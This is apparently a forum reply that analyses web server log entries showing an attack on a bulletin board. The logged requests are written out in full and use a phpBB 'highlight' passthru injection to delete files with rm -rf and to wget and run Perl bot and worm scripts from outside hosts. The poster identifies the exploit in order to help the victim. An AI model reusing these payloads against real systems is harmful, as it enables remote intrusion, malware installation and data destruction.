97a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 is GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527 GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; is GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
in your case the try on "/usr/local/apache/proxy/" did work
so you got the files in there, unfortunatelly none of the URL's above works, so cant find out what the perl scripts do, guess download more files and do something else
someone might have used this script to exploit you
http://www.k-otik.com/exploits/20041...pbb2010.pl.php
your sure its vbb 3.0.5? looks like the phpbb highlight exploit codeLast edited by sehe; 01-12-2005 at 03:26 PM.